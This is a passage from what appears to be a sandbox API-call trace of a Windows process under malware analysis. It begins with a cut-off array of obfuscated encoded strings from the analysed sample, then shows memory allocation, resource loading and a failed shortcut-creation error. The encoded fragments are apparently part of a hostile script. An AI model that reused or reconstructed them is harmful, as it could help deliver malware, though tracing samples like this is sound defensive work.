fA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 0x4b68
	[0096.442] GetProcessHeap () returned 0x1f0000
	[0096.442] RtlReAllocateHeap (Heap=0x1f0000, Flags=0x0, Ptr=0x228430, Size=0x11238) returned 0x25ae20
	[0096.443] ??2@YAPEAX_K@Z () returned 0x42f480
	[0096.443] GetCurrentThreadId () returned 0x358
	[0096.443] realloc (_Block=0x0, _Size=0xc8) returned 0x42f4e0
	[0096.443] ??2@YAPEAX_K@Z () returned 0x42f5b0
	[0096.443] malloc (_Size=0x1008) returned 0x42a4f0
	[0096.443] ??2@YAPEAX_K@Z () returned 0x42f5f0
	[0096.444] malloc (_Size=0x108) returned 0x427d80
	[0096.444] malloc (_Size=0x208) returned 0x42f7a0
	[0096.444] malloc (_Size=0x200) returned 0x42f9b0
	[0096.444] malloc (_Size=0x408) returned 0x42fbc0
	[0096.444] malloc (_Size=0x2008) returned 0x42b500
	[0096.445] malloc (_Size=0x808) returned 0x42d510
	[0096.445] malloc (_Size=0x1008) returned 0x42dd20
	[0096.446] malloc (_Size=0x4008) returned 0x43dfd0
	[0096.446] malloc (_Size=0x2008) returned 0x441fe0
	[0096.580] malloc (_Size=0x4008) returned 0x443ff0
	[0096.839] MulDiv (nNumber=111, nNumerator=100, nDenominator=512) returned 22
	[0096.839] CObjectContext::Release () returned 0x1
	[0096.839] GetTickCount () returned 0x28bf9
	[0096.839] ??2@YAPEAX_K@Z () returned 0x446560
	[0096.840] ??2@YAPEAX_K@Z () returned 0x446590
	[0096.840] ??2@YAPEAX_K@Z () returned 0x4465c0
	[0096.841] ??2@YAPEAX_K@Z () returned 0x4465f0
	[0096.841] ??2@YAPEAX_K@Z () returned 0x446620
	[0096.842] ??2@YAPEAX_K@Z () returned 0x446650
	[0096.842] ??2@YAPEAX_K@Z () returned 0x446680
	[0096.843] ??2@YAPEAX_K@Z () returned 0x4466b0
	[0096.843] ??2@YAPEAX_K@Z () returned 0x4466e0
	[0096.844] ??2@YAPEAX_K@Z () returned 0x446710
	[0096.844] ??2@YAPEAX_K@Z () returned 0x446740
	[0096.845] ??2@YAPEAX_K@Z () returned 0x446770
	[0096.845] ??2@YAPEAX_K@Z () returned 0x4467a0
	[0096.848] MulDiv (nNumber=491, nNumerator=100, nDenominator=917) returned 54
	[0096.848] CObjectContext::Release () returned 0x1
	[0096.848] GetTickCount () returned 0x28c09
	[0096.848] MulDiv (nNumber=256, nNumerator=100, nDenominator=938) returned 27
	[0096.848] CObjectContext::Release () returned 0x1
	[0096.848] GetTickCount () returned 0x28c09
	[0096.851] MulDiv (nNumber=669, nNumerator=100, nDenominator=1194) returned 56
	[0096.851] CObjectContext::Release () returned 0x1
	[0096.851] GetTickCount () returned 0x28c09
	[0096.852] MulDiv (nNumber=470, nNumerator=100, nDenominator=1042) returned 45
	[0096.852] CObjectContext::Release () returned 0x1
	[0096.852] GetTickCount () returned 0x28c09
	[0096.852] MulDiv (nNumber=256, nNumerator=100, nDenominator=1084) returned 24
	[0096.852] CObjectContext::Release () returned 0x1
	[0096.852] GetTickCount () returned 0x28c09
	[0096.856] MulDiv (nNumber=723, nNumerator=100, nDenominator=1341) returned 54
	[0096.856] CObjectContext::Release () returned 0x1
	[0096.856] GetTickCount () returned 0x28c18
	[0096.860] MulDiv (nNumber=369, nNumerator=100, nDenominator=1130) returned 33
	[0096.860] CObjectContext::Release () returned 0x1
	[0096.860] GetTickCount () returned 0x28c18
	[0096.860] MulDiv (nNumber=461, nNumerator=100, nDenominator=1275) returned 36
	[0096.860] CObjectContext::Release () returned 0x1
	[0096.861] GetTickCount () returned 0x28c18
	[0096.861] MulDiv (nNumber=256, nNumerator=100, nDenominator=1326) returned 19
	[0096.861] CObjectContext::Release () returned 0x1
	[0096.861] GetTickCount () returned 0x28c18
	[0096.863] MulDiv (nNumber=695, nNumerator=100, nDenominator=1583) returned 44
	[0096.863] CObjectContext::Release () returned 0x1
	[0096.863] GetTickCount () returned 0x28c18
	[0096.864] MulDiv (nNumber=550, nNumerator=100, nDenominator=1402) returned 39
	[0096.864] CObjectContext::Release () returned 0x1
	[0096.864] GetTickCount () returned 0x28c18
	[0096.864] MulDiv (nNumber=256, nNumerator=100, nDenominator=1364) returned 19
	[0096.864] CObjectContext::Release () returned 0x1
	[0096.864] GetTickCount () returned 0x28c18
	[0096.865] MulDiv (nNumber=604, nNumerator=100, nDenominator=1620) returned 37
	[0096.866] CObjectContext::Release () returned 0x1
	[0096.866] GetTickCount () returned 0x28c18
	[0096.867] MulDiv (nNumber=489, nNumerator=100, nDenominator=1535) returned 32
	[0096.867] CObjectContext::Release () returned 0x1
	[0096.867] GetTickCount () returned 0x28c18
	[0096.868] MulDiv (nNumber=425, nNumerator=100, nDenominator=1559) returned 27
	[0096.868] CObjectContext::Release () returned 0x1
	[0096.868] GetTickCount () returned 0x28c18
	[0096.869] MulDiv (nNumber=494, nNumerator=100, nDenominator=1646) returned 30
	[0096.869] CObjectContext::Release () returned 0x1
	[0096.869] GetTickCount () returned 0x28c18
	[0096.870] MulDiv (nNumber=494, nNumerator=100, nDenominator=1665) returned 30
	[0096.870] CObjectContext::Release () returned 0x1
	[0096.870] GetTickCount () returned 0x28c18
	[0096.871] FindResourceA (hModule=0x7fedf4c0000, lpName=0x139, lpType=0x6) returned 0x1b07f8
	[0096.872] LoadResource (hModule=0x7fedf4c0000, hResInfo=0x1b07f8) returned 0x1b1d44
	[0096.872] LockResource (hResData=0x1b1d44) returned 0x1b1d44
	[0096.872] SizeofResource (hModule=0x7fedf4c0000, hResInfo=0x1b07f8) returned 0x15c
	[0096.872] FreeResource (hResData=0x1b1d44) returned 0
	[0096.983] FindResourceA (hModule=0x7fedf4c0000, lpName=0x101, lpType=0x6) returned 0x1b07e8
	[0096.983] LoadResource (hModule=0x7fedf4c0000, hResInfo=0x1b07e8) returned 0x1b1c74
	[0096.983] LockResource (hResData=0x1b1c74) returned 0x1b1c74
	[0096.983] SizeofResource (hModule=0x7fedf4c0000, hResInfo=0x1b07e8) returned 0xce
	[0096.984] FreeResource (hResData=0x1b1c74) returned 0
	[0096.984] bsearch (_Key=0x19cf18, _Base=0x7fedf58a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fedf5181a0) returned 0x7fedf58a5a8
	[0096.984] ??2@YAPEAX_K@Z () returned 0x480a20
	[0096.985] MulDiv (nNumber=363, nNumerator=100, nDenominator=1688) returned 22
	[0096.985] CObjectContext::Release () returned 0x1
	[0096.985] GetTickCount () returned 0x28c95
	[0096.992] MulDiv (nNumber=446, nNumerator=100, nDenominator=1837) returned 24
	[0096.992] CObjectContext::Release () returned 0x1
	[0096.992] GetTickCount () returned 0x28c95
	[0096.993] MulDiv (nNumber=560, nNumerator=100, nDenominator=1904) returned 29
	[0096.993] CObjectContext::Release () returned 0x1
	[0096.994] GetTickCount () returned 0x28c95
	[0096.994] MulDiv (nNumber=256, nNumerator=100, nDenominator=1856) returned 14
	[0096.994] CObjectContext::Release () returned 0x1
	[0096.994] GetTickCount () returned 0x28c95
	[0096.997] MulDiv (nNumber=1282, nNumerator=100, nDenominator=2880) returned 45
	[0096.997] CObjectContext::Release () returned 0x1
	[0096.997] GetTickCount () returned 0x28c95
	[0096.999] MulDiv (nNumber=929, nNumerator=100, nDenominator=2679) returned 35
	[0096.999] CObjectContext::Release () returned 0x1
	[0096.999] GetTickCount () returned 0x28ca5
	[0097.001] MulDiv (nNumber=939, nNumerator=100, nDenominator=2821) returned 33
	[0097.001] CObjectContext::Release () returned 0x1
	[0097.001] GetTickCount () returned 0x28ca5
	[0097.002] MulDiv (nNumber=953, nNumerator=100, nDenominator=2951) returned 32
	[0097.002] CObjectContext::Release () returned 0x1
	[0097.002] GetTickCount () returned 0x28ca5
	[0097.005] MulDiv (nNumber=1053, nNumerator=100, nDenominator=3278) returned 32
	[0097.005] CObjectContext::Release () returned 0x1
	[0097.005] GetTickCount () returned 0x28ca5
	[0097.008] MulDiv (nNumber=1103, nNumerator=100, nDenominator=3418) returned 32
	[0097.008] CObjectContext::Release () returned 0x1
	[0097.008] GetTickCount () returned 0x28ca5
	[0097.012] MulDiv (nNumber=1032, nNumerator=100, nDenominator=3419) returned 30
	[0097.012] CObjectContext::Release () returned 0x1
	[0097.012] GetTickCount () returned 0x28ca5
	[0097.016] MulDiv (nNumber=986, nNumerator=100, nDenominator=3451) returned 29
	[0097.016] CObjectContext::Release () returned 0x1
	[0097.016] GetTickCount () returned 0x28cb4
	[0097.020] MulDiv (nNumber=1031, nNumerator=100, nDenominator=3503) returned 29
	[0097.020] CObjectContext::Release () returned 0x1
	[0097.020] GetTickCount () returned 0x28cb4
	[0097.023] MulDiv (nNumber=1023, nNumerator=100, nDenominator=3505) returned 29
	[0097.023] CObjectContext::Release () returned 0x1
	[0097.023] GetTickCount () returned 0x28cb4
	[0097.026] MulDiv (nNumber=997, nNumerator=100, nDenominator=3499) returned 28
	[0097.026] CObjectContext::Release () returned 0x1
	[0097.026] GetTickCount () returned 0x28cb4
	[0097.140] MulDiv (nNumber=972, nNumerator=100, nDenominator=3563) returned 27
	[0097.140] CObjectContext::Release () returned 0x1
	[0097.140] GetTickCount () returned 0x28d31
	[0097.145] MulDiv (nNumber=960, nNumerator=100, nDenominator=3619) returned 27
	[0097.145] CObjectContext::Release () returned 0x1
	[0097.145] GetTickCount () returned 0x28d31
	[0097.149] MulDiv (nNumber=1007, nNumerator=100, nDenominator=3706) returned 27
	[0097.149] CObjectContext::Release () returned 0x1
	[0097.149] GetTickCount () returned 0x28d31
	[0097.154] MulDiv (nNumber=1060, nNumerator=100, nDenominator=3765) returned 28
	[0097.155] CObjectContext::Release () returned 0x1
	[0097.155] GetTickCount () returned 0x28d41
	[0097.159] MulDiv (nNumber=1024, nNumerator=100, nDenominator=3595) returned 28
	[0097.159] CObjectContext::Release () returned 0x1
	[0097.159] GetTickCount () returned 0x28d41
	[0097.162] MulDiv (nNumber=1057, nNumerator=100, nDenominator=3645) returned 29
	[0097.162] CObjectContext::Release () returned 0x1
	[0097.163] GetTickCount () returned 0x28d41
	[0097.171] MulDiv (nNumber=981, nNumerator=100, nDenominator=3625) returned 27
	[0097.171] CObjectContext::Release () returned 0x1
	[0097.172] GetTickCount () returned 0x28d50
	[0097.185] MulDiv (nNumber=944, nNumerator=100, nDenominator=3711) returned 25
	[0097.249] CObjectContext::Release () returned 0x1
	[0097.249] GetTickCount () returned 0x28d9e
	[0097.252] _resetstkoflw () returned 0x1
	[0097.253] FindResourceA (hModule=0x7fedf4c0000, lpName=0x2, lpType=0x6) returned 0x1b0718
	[0097.253] LoadResource (hModule=0x7fedf4c0000, hResInfo=0x1b0718) returned 0x1b0b6c
	[0097.253] LockResource (hResData=0x1b0b6c) returned 0x1b0b6c
	[0097.253] SizeofResource (hModule=0x7fedf4c0000, hResInfo=0x1b0718) returned 0x86
	[0097.254] FreeResource (hResData=0x1b0b6c) returned 0
	[0097.254] FindResourceA (hModule=0x7fedf4c0000, lpName=0x101, lpType=0x6) returned 0x1b07e8
	[0097.254] LoadResource (hModule=0x7fedf4c0000, hResInfo=0x1b07e8) returned 0x1b1c74
	[0097.254] LockResource (hResData=0x1b1c74) returned 0x1b1c74
	[0097.254] SizeofResource (hModule=0x7fedf4c0000, hResInfo=0x1b07e8) returned 0xce
	[0097.255] FreeResource (hResData=0x1b1c74) returned 0
	[0097.255] bsearch (_Key=0xb30d8, _Base=0x7fedf58a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fedf5181a0) returned 0x7fedf58a410
	[0097.255] ??2@YAPEAX_K@Z () returned 0x4c86b0
	[0097.279] CreateErrorInfo (in: pperrinfo=0x19bdb0 | out: pperrinfo=0x19bdb0*=0x23a718) returned 0x0
	[0097.281] CErrorObject::SetGUID () returned 0x0
	[0097.281] CErrorObject::SetSource () returned 0x0
	[0097.281] LoadStringW (in: hInstance=0x7fef2560000, uID=0x1004, lpBuffer=0x19a4f0, cchBufferMax=2048 | out: lpBuffer="The shortcut pathname must end with .lnk or .url.") returned 0x31
	[0097.281] FormatMessageW (in: dwFlags=0x500, lpSource=0x23e558, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x19bdc0, nSize=0x0, Arguments=0x19be30 | out: lpBuffer="\xd380\x28") returned 0x31
	[0097.281] CErrorObject::SetDescription () returned 0x0
	[0097.281] CErrorObject::SetHelpFile () returned 0x0
	[0097.281] CErrorObject::SetHelpContext () returned 0x0
	[0097.281] QueryInterface () returned 0x0
	[0097.282] SetErrorInfo (dwReserved=0x0, perrinfo=0x23a710) returned 0x0
	[0097.282] Release () returned 0x2
	[0097.282] IUnknown:Release (This=0x23a710) returned 0x1
	[0097.282] LocalFree (hMem=0x28d380) returned 0x0
	[0097.282] IUnknown:Release (This=0x28c0f0) returned 0x1
	[0097.282] GetTickCount () returned 0x28dbd
	[0097.282] bsearch (_Key=0x19cf18, _Base=0x7fedf58a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fedf5181a0) returned 0x7fedf58a3e0
	[0097.282] ??2@YAPEAX_K@Z () returned 0x502050
	[0097.284] SetItemAlloc () returned 0x0
	[0097.284] Release () returned 0x1
	[0097.284] QueryInterface () returned 0x80004002
	[0097.284] QueryInterface () returned 0x80004002
	[0097.284] QueryInterface () returned 0x80004002
	[0097.284] QueryInterface () returned 0x80004002
	[0097.284] QueryInterface () returned 0x0
	[0097.284] Release () returned 0x1
	[0097.284] realloc (_Block=0x482b40, _Size=0x140) returned 0x444f90
	[0097.286] MulDiv (nNumber=959, nNumerator=100, nDenominator=3512) returned 27
	[0097.286] CObjectContext::Release () returned 0x1
	[0097.286] GetTickCount () returned 0x28dbd
	[0097.288] MulDiv (nNumber=942, nNumerator=100, nDenominator=3617) returned 26
	[0097.288] CObjectContext::Release () returned 0x1
	[0097.288] GetTickCount () returned 0x28dbd
	[0097.290] FindResourceA (hModule=0x7fedf4c0000, lpName=0x2, lpType=0x6) returned 0x1b0718
	[0097.290] LoadResource (hModule=0x7fedf4c0000, hResInfo=0x1b0718) returned 0x1b0b6c
	[0097.290] LockResource (hResData=0x1b0b6c) returned 0x1b0b6c
	[0097.290] SizeofResource (hModule=0x7fedf4c0000, hResInfo=0x1b0718) returned 0x86
	[0097.291] FreeResource (hResData=0x1b0b6c) returned 0
	[0097.291] FindResourceA (hModule=0x7fedf4c0000, lpName=0x101, lpType=0x6) returned 0x1b07e8
	[0097.291] LoadResource (hModule=0x7fedf4c0000, hResInfo=0x1b07e8) returned 0x1b1c74
	[0097.291] LockResource (hResData=0x1b1c74) returned 0x1b1c74
	[0097.291] SizeofResource (hModule=0x7fedf4c0000, hResInfo=0x1b07e8) returned 0xce
	[0097.292] FreeResource (hResData=0x1b1c74) returned 0
	[0097.292] bsearch (_Key=0xb30d8, _Base=0x7fedf58a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fedf5181a0) returned 0x7fedf58a410
	[0098.504] CDebugEventFire::IsActive () returned 0x1
	[0098.505] GetCurrentThreadId () returned 0x358
	[0098.505] ??3@YAXPEAX@Z () returned 0x7c35f001
	[0098.505] ??3@YAXPEAX@Z () returned 0x7c35f001
	[0098.505] ??3@YAXPEAX@Z () returned 0x7c35f001
	[0098.505] free (_Block=0x441730) 
	[0098.505] free (_Block=0x442310) 
	[0098.505] free (_Block=0x428600) 
	[0098.506] ??3@YAXPEAX@Z () returned 0x7c35f001
	[0098.506] ??3@YAXPEAX@Z () returned 0x7c35f001
	[0098.506] ??3@YAXPEAX@Z () returned 0x7c35f001
	[0098.506] free (_Block=0x440a90) 
	[0098.506] free (_Block=0x4283e0) 
	[0098.506] ??3@YAXPEAX@Z () returned 0x1
	[0098.506] ??3@YAXPEAX@Z () returned 0x7c35f001
	[0098.506] ??3@YAXPEAX@Z () returned 0x7c35f001
	[0098.508] CoGetObjectContext (in: riid=0x7fedf566350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19ed78 | out: ppv=0x19ed78*=0x20f420) returned 0x0
	[0098.508] free (_Block=0x524d90) 
	[0098.508] ??3@YAXPEAX@Z () returned 0x1
	[0098.508] free (_Block=0x4d8270) 
	[0098.508] free (_Block=0x525bc0) 
	[0098.508] free (_Block=0x4da140) 
	[0098.508] ??3@YAXPEAX@Z () returned 0xe007b0001
	[0098.508] ??3@YAXPEAX@Z () returned 0x1
	[0098.509] free (_Block=0x4d81e0) 
	[0098.509] free (_Block=0x525dd0) 
	[0098.509] free (_Block=0x4da030) 
	[0098.509] ??3@YAXPEAX@Z () returned 0xf01410001
	[0098.509] ??3@YAXPEAX@Z () returned 0x1
	[0098.509] free (_Block=0x524d50) 
	[0098.509] free (_Block=0x4d80c0) 
	[0098.509] free (_Block=0x517ba0) 
	[0098.509] ??3@YAXPEAX@Z () returned 0x1001360001
	[0098.509] ??3@YAXPEAX@Z () returned 0x1201600001
	[0098.509] free (_Block=0x524d10) 
	[0098.509] ??3@YAXPEAX@Z () returned 0x1301440001
	[0098.509] free (_Block=0x4d8030) 
	[0098.509] free (_Block=0x5257a0) 
	[0098.509] free (_Block=0x517a90) 
	[0098.509] ??3@YAXPEAX@Z () returned 0x1101200001
	[0098.509] ??3@YAXPEAX@Z () returned 0x2501a20001
	[0098.509] free (_Block=0x505dc0) 
	[0098.509] free (_Block=0x5259b0) 
	[0098.509] free (_Block=0x517980) 
	[0098.509] ??3@YAXPEAX@Z () returned 0x1201150001
	[0098.509] ??3@YAXPEAX@Z () returned 0x2005d0001
	[0098.509] free (_Block=0x524cd0) 
	[0098.509] free (_Block=0x505ca0) 
	[0098.510] free (_Block=0x517760) 
	[0098.510] ??3@YAXPEAX@Z () returned 0x13010a0001
	[0098.510] ??3@YAXPEAX@Z () returned 0x1401360001
	[0098.510] free (_Block=0x46d000) 
	[0098.510] free (_Block=0x4e2520) 
	[0098.510] ??3@YAXPEAX@Z () returned 0x1
	[0098.510] ??3@YAXPEAX@Z () returned 0x1
	[0098.510] free (_Block=0x46cb80) 
	[0098.510] free (_Block=0x4e1310) 
	[0098.510] ??3@YAXPEAX@Z () returned 0x4000650001
	[0098.510] ??3@YAXPEAX@Z () returned 0x26019a0001
	[0098.510] free (_Block=0x50a550) 
	[0098.510] free (_Block=0x4de8d0) 
	[0098.510] free (_Block=0x4f8730) 
	[0098.510] ??3@YAXPEAX@Z () returned 0x4100390001
	[0098.510] ??3@YAXPEAX@Z () returned 0x1
	[0098.510] free (_Block=0x524c90) 
	[0098.511] ??3@YAXPEAX@Z () returned 0x15011a0001
	[0098.511] free (_Block=0x505c10) 
	[0098.511] free (_Block=0x501890) 
	[0098.511] free (_Block=0x517650) 
	[0098.511] ??3@YAXPEAX@Z () returned 0x1400f40001
	[0098.511] ??3@YAXPEAX@Z () returned 0x27001a0001
	[0098.511] free (_Block=0x505b80) 
	[0098.511] free (_Block=0x501aa0) 
	[0098.511] free (_Block=0x517540) 
	[0098.511] ??3@YAXPEAX@Z () returned 0x1500e90001
	[0098.511] ??3@YAXPEAX@Z () returned 0x300560001
	[0098.511] free (_Block=0x50a510) 
	[0098.511] ??3@YAXPEAX@Z () returned 0xe4008e0001
	[0098.511] free (_Block=0x4de840) 
	[0098.511] free (_Block=0x44e420) 
	[0098.511] free (_Block=0x4f8620) 
	[0098.511] ??3@YAXPEAX@Z () returned 0x4201200001
	[0098.511] ??3@YAXPEAX@Z () returned 0x2801920001
	[0098.511] free (_Block=0x524c50) 
	[0098.511] free (_Block=0x505a60) 
	[0098.511] free (_Block=0x517320) 
	[0098.511] ??3@YAXPEAX@Z () returned 0x1600de0001
	[0098.511] ??3@YAXPEAX@Z () returned 0x16010c0001
	[0098.512] free (_Block=0x4de7b0) 
	[0098.512] free (_Block=0x44e630) 
	[0098.512] free (_Block=0x466750) 
	[0098.512] ??3@YAXPEAX@Z () returned 0x43010a0001
	[0098.512] ??3@YAXPEAX@Z () returned 0x1
	[0098.512] free (_Block=0x50a4d0) 
	[0098.512] free (_Block=0x4de690) 
	[0098.512] free (_Block=0x466530) 
	[0098.512] ??3@YAXPEAX@Z () returned 0x4400ff0001
	[0098.512] ??3@YAXPEAX@Z () returned 0xe500800001
	[0098.512] free (_Block=0x524c10) 
	[0098.512] ??3@YAXPEAX@Z () returned 0x1700f00001
	[0098.512] free (_Block=0x5059d0) 
	[0098.512] free (_Block=0x501470) 
	[0098.512] free (_Block=0x517210) 
	[0098.512] ??3@YAXPEAX@Z () returned 0x1700c80001
	[0098.512] ??3@YAXPEAX@Z () returned 0x29007a0001
	[0098.512] free (_Block=0x505940) 
	[0098.512] free (_Block=0x501680) 
	[0098.512] free (_Block=0x517100) 
	[0098.512] ??3@YAXPEAX@Z () returned 0x1800bd0001
	[0098.512] ??3@YAXPEAX@Z () returned 0x4004f0001
	[0098.513] free (_Block=0x50a490) 
	[0098.513] ??3@YAXPEAX@Z () returned 0xe600640001
	[0098.513] free (_Block=0x4de600) 
	[0098.513] free (_Block=0x4ccb20) 
	[0098.513] free (_Block=0x466420) 
	[0098.513] ??3@YAXPEAX@Z () returned 0x4500de0001
	[0098.513] ??3@YAXPEAX@Z () returned 0x2a018a0001
	[0098.513] free (_Block=0x524bd0) 
	[0098.513] free (_Block=0x505820) 
	[0098.513] free (_Block=0x516ee0) 
	[0098.513] ??3@YAXPEAX@Z () returned 0x1900b20001
	[0098.513] ??3@YAXPEAX@Z () returned 0x1800e20001
	[0098.513] free (_Block=0x4de570) 
	[0098.513] free (_Block=0x4cc910) 
	[0098.513] free (_Block=0x466310) 
	[0098.513] ??3@YAXPEAX@Z () returned 0x4600d30001
	[0098.513] ??3@YAXPEAX@Z () returned 0x6e006f4800480001
	[0098.513] free (_Block=0x50a450) 
	[0098.513] free (_Block=0x4de450) 
	[0098.513] free (_Block=0x4660f0) 
	[0098.513] ??3@YAXPEAX@Z () returned 0x4700c80001
	[0098.513] ??3@YAXPEAX@Z () returned 0xe700560001
	[0098.514] free (_Block=0x524b90) 
	[0098.514] ??3@YAXPEAX@Z () returned 0x1900c60001
	[0098.514] free (_Block=0x505790) 
	[0098.514] free (_Block=0x501050) 
	[0098.514] free (_Block=0x516dd0) 
	[0098.514] ??3@YAXPEAX@Z () returned 0x1a009c0001
	[0098.514] ??3@YAXPEAX@Z () returned 0x2b00720001
	[0098.514] free (_Block=0x505700) 
	[0098.514] free (_Block=0x501260) 
